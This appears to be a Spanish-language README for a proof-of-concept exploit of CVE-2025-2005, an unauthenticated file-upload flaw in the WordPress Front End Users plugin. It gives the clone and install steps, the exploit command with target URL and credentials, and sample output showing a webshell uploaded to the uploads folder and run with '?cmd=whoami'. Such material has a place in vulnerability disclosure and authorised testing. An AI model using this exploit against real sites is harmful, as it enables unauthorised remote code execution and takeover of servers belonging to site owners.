
Exploit de carga arbitraria de archivos en WordPress FEUP (CVE-2025-2005)
Este repositorio proporciona un exploit de Prueba de Concepto (PoC) para el plugin Front End Users de WordPress (versiones hasta 3.2.32), el cual es vulnerable a subida arbitraria de archivos debido a la falta de validación de tipo MIME/archivo en su formulario de registro. Esto permite a atacantes no autenticados subir archivos maliciosos (por ejemplo, webshells), lo que potencialmente conduce a Ejecución Remota de Código (RCE) en el servidor.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami